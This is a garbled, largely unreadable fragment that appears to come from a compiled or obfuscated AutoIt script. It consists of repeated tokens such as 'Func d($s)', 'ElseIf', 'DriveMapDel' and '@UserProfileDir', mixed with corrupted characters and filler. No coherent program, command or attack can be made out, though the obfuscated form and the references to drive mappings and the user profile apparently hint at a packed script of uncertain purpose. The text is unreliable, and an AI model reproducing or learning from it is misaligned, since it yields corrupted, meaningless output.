]]Ý0=0=0=0=0=6=0=0=6=2=8=0=0=1=9=0=nC|n($s)Æunc d($p)F d($s)æ0Ifæ1ThenäElseIfæ0ElseIf 2Elsen($s)Æunc d($p)Func g($s)Func d($s)æ0Ifæ1ThenäElseIfæ0EnuflllseIf 2Else 4ThenäIfæ1Ifæ1ThenäElseIfæ1ElseIfæ1ThenäElseIfæ1ElseIf 2Else0=0=6=0=0=6=2=8=0=0=1=9=0}=nc„š($s)Æunc d($p)Func g($s)Func d($s)æ0Ifæ1ThenäElseIfæ0ElseIf 2Elsen($s)ÆunenäElseIfæ0ElseIf 2ElseIfæ1Ifæ2ElseIfæ1ElseIf 1 1ElseIfæ1ElseIf 2Ifæ1ThenäEl(DriveMÿapDel$s)³Func|n($s)Func d($p)FuNc|n($s)Func d($s)!FuneIf 1Else1=0=6=0=8=0=0=1=|n($s)Func|n($s)Func Fpj)(d$uc g($s)Func¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿³¿¿¿¿













eIfæ1Ifæ1ThenäElseIf 1ElseIfæ1ElseIf 2Ifæ1ThenäEl(DriveMapDel$s)Fun($s)Func d($p)FuNc|n($s)Func d($s)Func|n($s)FuncIf 2ElseIfæ1ElseIf 1Else0=0=6=0=8=0=0=1=|n($s)|Func d($2ElseIfæ1d($p)Func g($s)Func d($s)æ0Ifæ1ThenäElseIfæ0ElseIf 2ElseIfæ1Ifæ1ThenäElseIfæ1ElseIf 9=2ElseIfæ1ElseIf 1 1ElseIfæ1ElseIf 2Ifæ1ThenäEl(DriveMapDel$s)Func|n($s)Func d($p)FuNc|n($s)unc|n($s)FuncIseIfæ1$p)FuNc=0=8=0=0=1=|n($s)Func|n($s)Func Fpn)(d$uc g($s)Func d($s)æ0IfFunc d($p)Func g($s)Func d($s)æ0Ifæ1ThenäElseIfæ0henäElseIfæ1ElseIf 9=22Ifæ1ThenäEl(DriveMapDel$s)Func|n($s)Func d($p)FuNc|n($s)Func d($s)Func|n($s)Func@taI=@UserProfileDirnc|n($s)Func d($p)Func g($s)<Func d($s)æ0Ifæ1ThenäElseIfæ0ElseIf 2ElseIfæ1Ifæ1ThenäEls#cseIfæ1ElseIf 9=2ElseI



fæ